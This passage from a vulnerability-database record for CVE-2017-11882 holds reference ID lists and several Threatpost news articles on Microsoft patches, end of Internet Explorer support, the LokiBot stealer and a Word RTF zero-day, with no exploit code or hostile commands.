"THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:C1850156F9F2124BACDC7601CCFA6B30", "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "THREATPOST:C442C6ABA3916CAA62C89BC2CB6332CD", "THREATPOST:C47E4314F4EEB30F0139DF3BC8B47E01", "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "THREATPOST:C56525805A371C56B68CE54AB4EDB9AF", "THREATPOST:C5D967CF7CFD8422FD9ACFC1CF7277A6", "THREATPOST:C8BB08507CBCCE4C217C33C15D3AA04D", "THREATPOST:C9B3ABEF738D9A1E524FB94613BA5CBA", "THREATPOST:C9C5B1554A6F4216A73108C0748E16EF", "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "THREATPOST:CDCABD1108763209B391D5B81AE03CF7", "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "THREATPOST:D053D0BAA76AC62C5AFCB77CBFD61B6D", "THREATPOST:D11D4E32822220251B14068F9BAAD17E", "THREATPOST:D292185F5E299FDB7366DDAA750D6070", "THREATPOST:D3F6B40A3A2EF494FE7F0AFC7768F7CD", "THREATPOST:D40D286C87360AFDC61FCD9AD506D78F", "THREATPOST:D49075D6FFF077A542015B7F806F4E27", "THREATPOST:D4C8CD7D146990740B8339D88A3FDB84", "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "THREATPOST:D58796CB8261B361ADF389131F955AE3", "THREATPOST:D5CE687F92766745C002851DFA8945DE", "THREATPOST:D6D859A31F73B00E9B6F642D4C89B344", "THREATPOST:D8172FCB461F5843B3391B2336A4D02F", "THREATPOST:D8CDE16C2F1722831D3106563D1F1551", "THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "THREATPOST:DC3489917B7B9C6C1824FB61C05E82CD", "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "THREATPOST:DD7A2F272ACFDE71B0A0CEC234C35876", "THREATPOST:DDDE126E49EC98A6A15655F564E25620", "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "THREATPOST:DF54323828EEC1DDCE4B2312AC6F085F", "THREATPOST:E067CFBFA163616683563A8ED34648FE", "THREATPOST:E068C231265847BA99669A8EBF0D395D", "THREATPOST:E22E26BB31C17ACCC98C59076AF88CD7", "THREATPOST:E46805A1822D16B4725517D4B8786F57", "THREATPOST:E4FBCA31AB2D69F0292283738E873960", "THREATPOST:E539817E8025A93279C63158F37F2DFB", "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "THREATPOST:E6DC1F407BA6CEE26FE38C95EBB10D7A", "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "THREATPOST:E7C5C8276111C637456F053327590E4C", "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "THREATPOST:EC55500DAF9E1467C9C94C82758F810C", "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "THREATPOST:EE14785AC189E016FD2CE51464D3643D", "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "THREATPOST:EF7DCA1CE0B1A1B1D93B4E4F7A3A3163", "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "THREATPOST:F158248C80174DD4B29AE26B4B4139C0", "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "THREATPOST:F1E0D1BF5C51CAA730D94DB196D962D1", "THREATPOST:F261FA3F1DECA361A6DBC169065B1101", "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F514D796FE42C0629BD951D8664A2420", "THREATPOST:F61F8A6168C36EAB1584BC8044080B35", "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "THREATPOST:F701F7503777655BB413FCBEFB88C8DE", "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "THREATPOST:FB6C6CE8F3B4AE6846C8AB866C36F024", "THREATPOST:FBDE9552D48B698542D65DEA64890566", "THREATPOST:FBF1F4B1FB26C8B1E95965E920F985EF", "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "THREATPOST:FCF1B008BD9B10ADDA0703FDB9CBAA04", "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1FEAB54A2EB3929007298481113A7219", "TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022", "1337DAY-ID-29119"]}]}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD"]}, {"type": "cert", "idList": ["VU:421280"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-1009"]}, {"type": "cve", "idList": ["CVE-2017-11882"]}, {"type": "exploitdb", "idList": ["EDB-ID:43163"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB"]}, {"type": "fireeye", "idList": ["FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394"]}, {"type": "kaspersky", "idList": ["KLA11139"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11882"]}, {"type": "mskb", "idList": ["KB2553204", "KB3162047", "KB4011262", "KB4011604", "KB4011618"]}, {"type": "mssecure", "idList": ["MSSECURE:C3D318931D83D536C01D2307EBC0B3B0"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891024", "MYHACK58:62201892253"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145226"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:97274435F9F49556ED060635FD9081E2"]}, {"type": "securelist", "idList": ["SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:F1FC61836DCAA7F1E27411092B208523"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148"]}, {"type": "thn", "idList": ["THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:C21D17F1D92C12B031AB9C761BBD004A", "THN:C473C49BA4C68CD048FB1E0B4A2D04F4", "THN:CBEFDC179819629DFFC0C17341BFD3E8", "THN:ED087560040A02BCB1F68DE406A7F577"]}, {"type": "threatpost", "idList": ["THREATPOST:0234DE925A24BDFF85D569B0592C4E40", "THREATPOST:26EDD0A7C1914DBF0CFE32B0877BE5A7", "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022"]}]}, "exploitation": null, "vulnersScore": 6.7}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}

{"threatpost": [{"lastseen": "2018-10-06T22:55:55", "description": "Anxiety was high around April 8, 2014 when Microsoft officially closed the door on [security support for Windows XP](<https://threatpost.com/windows-xp-end-of-life-breeding-equal-parts-fud-legit-concerns/105252/>). Many envisioned black hats worldwide stockpiling exploits waiting for the day when XP machines would be left permanently exposed.\n\nThe anticipated malware apocalypse, however, never really came for the remaining XP machines in circulation.\n\nAnd now here we are again with another important [Microsoft-imposed deadline](<https://www.microsoft.com/en-us/WindowsForBusiness/End-of-IE-support>) at hand, and again anxiety is bubbling\u2014but perhaps with good reason this time.\n\nNext Tuesday will bring the first batch of Microsoft security bulletins for 2016 and it will also herald the end of security support for Internet Explorer versions 8, 9 and 10 on some Microsoft platforms. Microsoft made the call almost 18 months ago, giving businesses ample time to prepare for the day when those versions of IE, [battered by zero-days](<https://threatpost.com/microsoft-to-fix-word-zero-day-with-final-xp-patch/105241/>), exploit kits and targeted attacks, should be retired.\n\nReality, however, usually bites.\n\nEnterprises and midmarket companies reliant on homegrown web applications that were built for IE 8, 9 or 10 aren\u2019t in any hurry for a costly retool of those programs to work seamlessly on IE 11 or the new Edge browser. Statistics from a number of sources bear out the fact that there remains a significant percentage of web traffic moving through IE. [Netmarketshare.com](<https://www.netmarketshare.com/browser-market-share.aspx?qprid=2&qpcustomd=0>), for example, says that while IE 11 holds more than 25 percent of market share, IE 8, 9 and 10 combined still account for more than 20 percent. Researchers at Duo Security, examining traffic moving through their services, [put the percentage a bit higher](<https://www.duosecurity.com/blog/microsoft-drops-support-for-internet-explorer-just-how-big-of-deal-is-this>) for IE 9 and 10\u2014almost 36 percent\u2014running on Windows 7, 8, or 8.1.\n\nGiven that browsers historically offer hackers a much juicier attack surface than operating systems, folks may want to take Tuesday\u2019s deadline seriously.\n\n\u201cIn most cases an attacker will need to already have access to a local network or be able to trick users into opening malicious files as part of a successful attack leveraging Windows XP vulnerabilities,\u201d said Tripwire security researcher Craig Young. \u201cThe web browser on the other hand is of course used to constantly process data from potentially untrusted sources leaving users exposed to a wide range of attack.\u201d\n\nMicrosoft, for its part, continues to roll out patches for IE at a near record pace. Patch Tuesday the second Tuesday of every month brings with it routine cumulative updates for the browser, sometimes addressing two- or three-dozen CVEs, most of which enable remote code execution and bypass some existing security mitigation.\n\n\u201cAttackers have known since the summer of 2014 that Microsoft was dropping support for IE; it\u2019s reasonable to assume that attackers know people are staying on these platforms and will take advantage of the circumstances,\u201d said Michael Hanley, program manager of research and development at Duo Security. \u201cWe still expect an aggressive effort against IE 8, 9 and 10 going into 2016.\u201d\n\nMicrosoft [isn\u2019t completely abandoning IE 8, 9 and 10](<https://support.microsoft.com/en-us/lifecycle#gp/Microsoft-Internet-Explorer>), however. IE 9 will still be supported on Vista SP 2 desktops, while IE 9 will be continue to receive support on Windows Server 2008 SP2 and IA64, while IE 10 will be supported on Windows Server 2012.\n\nTripwire\u2019s Young said that while attackers may not be hoarding IE 8, 9 and 10 exploits right now, they are going to be paying attention what\u2019s patched in IE 11 going forward.\n\n\u201cIt is also quite safe to assume that even without attackers stockpiling IE vulnerability information ahead of the support cut-off that attackers will easily learn new attack techniques by analyzing future IE 11 updates,\u201d Young said. \u201cSome rough estimates using Tripwire VERT\u2019s vulnerability database indicates that more than two-thirds of the vulnerabilities addressed in IE 11 also required patching in previous versions.\u201d\n\nAnd then there\u2019s application compatibility. Enterprises, experts said, should weight the cost of updating applications to work with the newest browsers against the cost of a breach of a legacy system via IE.\n\n\u201cThe cost of a breach is so high, companies need to move toward apps that support latest security technology, browsers and OSes,\u201d Hanley said.\n\nYoung notes that this is one instance where consumers, because of Windows Update automation, may already be on IE 11 and ahead of business implementations in terms of security.\n\n\u201cWith some applications it can be non-trivial to port code to the newer browsers with many organizations trying to defer the associated costs for as long as possible,\u201d Young said. \u201cWhile there may not be an immediate security risk from using an industry specific web applications with the unsupported browser, problems arise during the lunch hour when employees start exploring the web. Businesses with application requirements for older web browsers would be well advised to block browsing from these systems.\u201d\n", "cvss3": {}, "published": "2016-01-08T13:41:04", "type": "threatpost", "title": "End of Life Internet Explorer 8, 9, 10 Security Support", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-01-13T14:09:22", "id": "THREATPOST:1E11FA7540C2CE7C48832A342FAAB3A8", "href": "https://threatpost.com/older-ie-versions-losing-security-support-on-tuesday/115828/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-09T22:13:17", "description": "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning that the LokiBot info-stealing trojan is seeing a surge across the enterprise landscape.\n\nThe uptick started in July, according to the agency, and activity has remained \u201cpersistent\u201d ever since.\n\nLokiBot targets Windows and [Android endpoints](<https://threatpost.com/lokibot-redux-common-android-apps/157458/>), and spreads mainly through email (but also via malicious websites, texts and messaging). It typically goes after credentials (usernames, passwords, cryptocurrency wallets and more), as well as personal information. The malware steals the data through the use of a keylogger to monitor browser and desktop activity, CISA explained.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cLokiBot has stolen credentials from multiple applications and data sources, including Windows operating system credentials, email clients, File Transfer Protocol and Secure File Transfer Protocol clients,\u201d according to the alert, [issued Tuesday](<https://us-cert.cisa.gov/ncas/alerts/aa20-266a>). \u201cLokiBot has [also] demonstrated the ability to steal credentials from\u2026Safari and Chromium and Mozilla Firefox-based web browsers.\u201d\n\nTo boot, LokiBot can also act as a backdoor into infected systems to pave the way for additional payloads.\n\nLike its Viking namesake, LokiBot is a bit of a trickster, and disguises itself in diverse attachment types, sometimes using steganography for maximum obfuscation. For instance, the malware has been disguised as a .ZIP attachment [hidden inside a .PNG file](<https://threatpost.com/lokibot-trojan-spotted-hitching-a-ride-inside-png-files/143491/>) that can slip past some email security gateways, or [hidden as an ISO disk image](<https://threatpost.com/malspam-emails-blanket-lokibot-nanocore-malware-with-iso-files/145991/>) file attachment.\n\nIt also uses a number of application guises. Since LokiBot was first reported in 2015, cyber actors have used it across a range of targeted applications,\u201d CISA noted. For instance, in February, it was seen [impersonating a launcher](<https://www.trendmicro.com/en_us/research/20/b/lokibot-impersonates-popular-game-launcher-and-drops-compiled-c-code-file.html>) for the popular Fortnite video game.\n\nOther tactics include the use of zipped files along with malicious macros in Microsoft Word and Excel, and leveraging the exploit [CVE-2017-11882](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>) (an issue in Office Equation Editor that allows attackers to automatically run malicious code without requiring user interaction). The latter is done via malicious RTF files, researchers have observed.\n\nTo boot, researchers [have seen the malware being sold](<https://threatpost.com/u-s-manufacturer-most-recent-target-of-lokibot-malspam-campaign/148153/>) as a commodity in underground markets, with versions selling for as little as $300.\n\nWith all of these factors taken together, LokiBot represents \u201can attractive tool for a broad range of cyber actors across a wide variety of data compromise use cases,\u201d according to CISA.\n\nSaryu Nayyar, CEO at Gurucul, noted that the advisory is another indication of how malware authors have turned their malicious activities into a scalable business model.\n\n\u201cThe fact that LokiBot has been around for over four years and has gained in capability over time is a reflection of how much malicious actors have advanced the state of their art, leveraging the same development models we use in the commercial space,\u201d she said, via email.\n\nTo protect themselves, CISA said that companies should keep patches up to date, disable file- and printer-sharing services if not necessary, enforce multi-factor authentication and strong passwords, enable personal firewalls and scanning of downloads, and implement user education on how to exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known.\n", "cvss3": {}, "published": "2020-09-23T15:27:18", "type": "threatpost", "title": "CISA: LokiBot Stealer Storms Into a Resurgence", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2020-09-23T15:27:18", "id": "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "href": "https://threatpost.com/cisa-lokibot-stealer-resurgence/159495/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:09:10", "description": "Microsoft today denied that it has built a \nbackdoor into Windows 7, a concern that surfaced yesterday after a \nsenior National Security Agency (NSA) official testified before \nCongress that the agency had worked on the operating system. \u201cMicrosoft has not and will not put \u2018backdoors\u2019 into Windows,\u201d a company spokeswoman said. [Read the full article](<http://www.computerworld.com/s/article/9141182/Microsoft_denies_it_built_backdoor_in_Windows_7>). [Computerworld]\n", "cvss3": {}, "published": "2009-11-19T21:17:20", "type": "threatpost", "title": "MS Denies Windows 7 Backdoor Allegations", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:06:04", "id": "THREATPOST:3973FA851D33322A013EA1314A1AACC7", "href": "https://threatpost.com/ms-denies-windows-7-backdoor-allegations-111909/73142/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "Microsoft will use its monthly patch to fix a critical security hole in versions of its Microsoft Office suit that could allow attackers to run malicious code on vulnerable systems. \n\nThe company [announced details of its upcoming monthly patch for November on Thursday](<http://www.microsoft.com/technet/security/bulletin/ms10-nov.mspx>). This months patch also included bulletins regarding upcoming fixes for two other security vulnerabilities: another in the Microsoft Office suite that was rated \u201cimportant,\u201d and a third in the Forefront Unified Access Gateway that was also rated \u201cimportant.\u201d \n\nThe relatively meager group of three bulletins is a welcome change for IT administrators still trying to dig out from[ October\u2019s monthly patch](<https://threatpost.com/microsoft-plans-record-breaking-patch-tuesday-100710/>), which comprised 16 bulletins and fixes for 49 separate vulnerabilities. \n\nThe most serious vulnerability is rated \u201ccritical\u201d for Microsoft Office 2007, Service Pack 2 and for 32 and 64 bit editions of Office 2010. It is rated \u201cimportant\u201d for Office 2003, Service Pack 3, Office XP, Service Pack 3 and Office for Mac 2011. \n\nAccording to Microsoft\u2019s Bulletin [Severity Rating System](<http://www.microsoft.com/technet/security/bulletin/rating.mspx>), \u201ccritical\u201d vulnerabilities are described as those whose exploitation could allow the propagation of an Internet worm without user interaction, while \u201cimportant\u201d holes are those in which exploitation could result in the compromise of the confidentiality, integrity or availability of users\u2019 data or processing resources. \n\nA second Office vulnerability is rated \u201cimportant\u201d and effects PowerPoint 2002 Service Pack 3 and PowerPoint 2003 Service Pack 3. \n\nThe third bulletin affects Microsoft\u2019s Forefront Unified Access Gateway 2010 Updates 1 and 2 and is rated important. \n\nMicrosoft will release its monthly patch update on Tuesday November 9, 2010. \n", "cvss3": {}, "published": "2010-11-04T21:58:02", "type": "threatpost", "title": "Microsoft To Patch Critical Office Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:44", "id": "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "href": "https://threatpost.com/microsoft-patch-critical-office-flaw-110410/74642/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:09", "description": "Targeted attacks have been spotted against a zero-day vulnerability in Microsoft Word 2010, leading Microsoft to issue a special [security advisory](<http://blogs.technet.com/b/msrc/archive/2014/03/24/microsoft-releases-security-advisory-2953095.aspx>) and produce a [Fix-it solution](<https://support.microsoft.com/kb/2953095>) for users until a patch is ready.\n\nMicrosoft also said that its Enhanced Mitigation Experience Toolkit (EMET) is a temporary mitigation for the zero-day. Some versions of EMET would have to be configured to work with Microsoft Office in order to ward off exploits; EMET 4.1 is already configured for Office, for example.\n\nWhile attacks are currently targeting Microsoft Word 2010, Microsoft said the vulnerability affects Word 2003, 2007, 2013 and 2013RT, as well as Office for Mac, Office Web Apps 2010 and 2013, and Word Viewer.\n\nAn attacker could exploit the vulnerability with a malicious Rich Text Format file or email in Outlook configured to use Microsoft Word as the email viewer, said Dustin Childs, a Trustworthy Computing group manager at Microsoft.\n\nThe vulnerability can also be exploited over the Web where an attacker could host a website containing a malicious RTF exploit, or upload a malicious RTF exploit onto a site that accepts user-provided content. Victims would have to be enticed into opening the content; an exploit cannot be triggered without user interaction.\n\nThe Fix it disables opening of RTF content in Word, Microsoft said.\n\n\u201cThe issue is caused when Microsoft Word parses specially crafted RTF-formatted data causing system memory to become corrupted in such a way that an attacker could execute arbitrary code,\u201d Microsoft said in its advisory, adding that Word is by default the email reader in Outlook 2007, 2010 and 2013.\n\nMicrosoft said it could release an out-of-band patch, but more likely it will wait until its next Patch Tuesday security updates are released on April 8. That date also signals the end of support for Windows XP, Microsoft announced some time ago.\n\nMicrosoft has made it a common practice to release Fix it mitigations or recommend the use of EMET as a temporary stopgap while zero-day vulnerabilities are being actively exploited in the wild. The last one issued was in February for a string of attacks against a [zero day in Internet Explorer](<http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CCcQFjAA&url=http%3A%2F%2Fthreatpost.com%2Fmicrosoft-ships-fix-it-for-ie-10-zero-day%2F104383&ei=pH8wU-bhGcyGkQeZ7YDoBA&usg=AFQjCNGZPcpQBjYGur3Gsyg2qMm5Pwg--Q&bvm=bv.62922401,d.eW0&cad=rja>).\n\nThe vulnerability in IE 10 was exploited by [two different hacker groups](<http://threatpost.com/second-group-seen-using-ie-10-zero-day/104344>) against government and aerospace targets in the U.S. and France respectively. The same use-after-free vulnerability was present in IE 9 but was not being exploited.\n\nEMET has also been a popular mitigation recommendation from Microsoft against memory-based vulnerabilities. The toolkit contains a dozen mitigations that fend off buffer overflow attacks and others that allow attackers to execute code on vulnerable machines.\n\nMost recently, Microsoft released a [technical preview of EMET 5.0](<http://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490>) that included two new exploit mitigations. Researchers, however, have been finding moderate success in developing [bypasses for some of the protections bundled in with EMET](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>).\n", "cvss3": {}, "published": "2014-03-24T15:20:55", "type": "threatpost", "title": "Microsoft Advisory Warns of Word Zero-Day Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-27T17:51:05", "id": "THREATPOST:E4FBCA31AB2D69F0292283738E873960", "href": "https://threatpost.com/targeted-attacks-exploit-microsoft-word-zero-day/104980/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:38", "description": "****[](<https://threatpost.com/stephen-toulouse-msrc-evolution-security-microsoft-and-securing-xbox-live-091009/>)Dennis Fisher talks with Stephen Toulouse, director of policy and enforcement for Xbox Live at Microsoft, about his years at the Microsoft Security Response Center, the evolution of security at Microsoft and the joy and pain of being the bad guy on Xbox Live.\n\n[(Download)](<https://threatpost.com/files/2013/04/digital_underground_301.mp3>)\n\nSubscribe to the Digital Underground podcast on [****](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n", "cvss3": {}, "published": "2009-09-10T19:45:50", "type": "threatpost", "title": "Stephen Toulouse on the MSRC, the Evolution of Security at Microsoft and Securing Xbox Live", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:44", "id": "THREATPOST:EE14785AC189E016FD2CE51464D3643D", "href": "https://threatpost.com/stephen-toulouse-msrc-evolution-security-microsoft-and-securing-xbox-live-091009/73017/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:54", "description": "[](<https://threatpost.com/microsoft-pushes-emergency-patch-aspnet-flaw-092810/>)Microsoft has released the emergency out-of-band patch for the [ASP.NET padding oracle attack](<https://threatpost.com/microsoft-pushes-emergency-patch-aspnet-flaw-092810/>), less than two weeks after a pair of researchers discussed the flaw and a reliable attack against it at a security conference in Argentina. \n\nThe patch for the ASP.NET bug is only available through [Microsoft\u2019s Download Center](<https://www.microsoft.com/downloads/en/default.aspx?pf=true>) right now, but the company plans to push it out over Windows Update and Windows Server Update within a few days, as well. \n\n\u201cFor customers who use Automatic Updates, the update will be \nautomatically applied once it is released broadly. Once the Security \nUpdate is applied, customers are protected against known attacks related \nto Security Advisory 2416728,\u201d said Dave Forstrom, director of Trustworthy Computing at Microsoft. \n\nThe company will hold a [live webcast](<https://msevents.microsoft.com/CUI/WebCastEventDetails.aspx?EventID=1032464130&EventCategory=4&culture=en-US&CountryCode=US>) at 4 p.m. EDT Tuesday to discuss the vulnerability and the patch release. \n\nThe ASP.NET vulnerability first game to light on Sept. 13 when the researchers who discovered the vulnerability, Juliano Rizzo and Thai Duong, [discussed the bug and their technique for exploiting it](<https://threatpost.com/microsoft-pushes-emergency-patch-aspnet-flaw-092810/>). The attack itself is an implementation of an existing technique developed several years ago to exploit weaknesses in crypto implementations.\n\n\u201cWe knew ASP.NET was vulnerable to our attack several months ago, but we \ndidn\u2019t know how serious it is until a couple of weeks ago. It turns out \nthat the vulnerability in ASP.NET is the most critical amongst other \nframeworks. In short, it totally destroys ASP.NET security,\u201d said Duong, when discussing the attack. \u201cIt\u2019s worth noting that the attack is 100% reliable, i.e. one can be \nsure that once they run the attack, they can exploit the target. It\u2019s \njust a matter of time. If the attacker is lucky, then he can own any \nASP.NET website in seconds. The average time for the attack to complete \nis 30 minutes. The longest time it ever takes is less than 50 minutes.\u201d\n\nLast week Microsoft released some guidance for customers, explaining a couple of workarounds for the vulnerability that could help mitigate attacks. However, Rizzo and Duong said that the workarounds, which rely on changing the way that error messages are generated by target Web applications, don\u2019t protect against the attack, just one version of it.\n\nMicrosoft didn\u2019t release any information on the vulnerability until Sept. 17, the day that Rizzo and Duong gave their presentation at Ekoparty. This is the second time in less than two months that Microsoft has released an emergency patch. On Aug. 2, the company issued an [out-of-band patch](<https://threatpost.com/attacks-escalate-microsoft-ships-emergency-windows-patch-080210/>) for the original bug that was identified as part of the Stuxnet malware attack. \n", "cvss3": {}, "published": "2010-09-28T18:12:43", "type": "threatpost", "title": "Microsoft Pushes Emergency Patch For ASP.NET Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:24:17", "id": "THREATPOST:8EC1069E3114E28911EA3438DA21B952", "href": "https://threatpost.com/microsoft-pushes-emergency-patch-aspnet-flaw-092810/74525/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:17", "description": "[](<https://threatpost.com/microsoft-give-security-guidelines-agile-110909/>)Microsoft will release on Tuesday \nguidelines for developers building online applications and for those using the Agile code-development process. The Agile guidelines apply principles from Microsoft\u2019s Security \nDevelopment Lifecycle (SDL) to Agile, an umbrella term for a \ndevelopment model frequently used for Web-based applications released \nunder short deadlines, called \u201csprints.\u201dilding online applications and for those \nusing the Agile code-development process. [Read the full article](<http://www.computerworld.com/s/article/9140543/Microsoft_to_release_security_guidelines_for_Agile>). [Computerworld]\n", "cvss3": {}, "published": "2009-11-09T18:26:11", "type": "threatpost", "title": "Microsoft to Give Security Guidelines for Agile", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:14:29", "id": "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "href": "https://threatpost.com/microsoft-give-security-guidelines-agile-110909/73057/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:13", "description": "In part two of his lecture on exploiting Microsoft Windows, Dino Dai Zovi discusses specific techniques for attacking Windows machines.\n", "cvss3": {}, "published": "2009-11-16T16:24:46", "type": "threatpost", "title": "Windows Exploitation Part 2", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-07-02T19:24:32", "id": "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "href": "https://threatpost.com/windows-exploitation-part-2-111609/73105/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:20", "description": "Dennis Fisher talks to Adam Shostack of Microsoft, about the evolution of thinking around \u201cThe New School of Information Security,\u201d his new group blog and what surprised him most when he went to work at 